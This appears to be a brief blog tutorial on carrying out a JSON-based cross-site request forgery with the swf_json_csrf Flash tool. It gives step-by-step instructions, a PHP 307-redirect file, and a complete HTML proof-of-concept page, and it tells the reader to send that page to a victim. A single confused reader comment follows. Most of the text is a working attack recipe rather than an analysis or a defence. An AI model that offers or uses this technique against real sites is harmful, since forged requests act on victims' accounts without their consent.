Step-1
Go to terminal and typegit cloneĀ https://github.com/sp1d3r/swf_json_csrf.git
Step 2
now we have to create an 307 redirect file and paste the target endpoint in the file<?php
header("Location: https://target.com/endpoint", true, 307);
?>
Step 3
Now we have to fill the appropriate details in the form
PHP redirector -- > address of the step 2 file
Destination --> Target endpoint
POST-Date --> Data that needed to be sent to target endpoint
Response --> keep it blank
After that press f12 button to open the developer toolkit.
Click launch Button
copy the Request url send to test.swf file
Step 4Ā
Now we have the url . We can create an CSRF POC using htmlCreate an new html file
Using <object data="PASTE URL HERE"><object>
Save file
Send the CSRF POC to victim
And the final POC will look likeĀ
<!DOCTYPE html><html>
<head>
<title></title>
</head>
<body>
<object data="http://127.0.0.1/swf_json_csrf/test.swf?endpoint=http://target.com/users&reqmethod=POST&ct=application/json&jsonData={%22test%22:%22test%22}&php_url=http://127.0.0.1/test.php"></object>
</body>
</html>
Thank you.
How can I contact you? I am confused about something here
ReplyDelete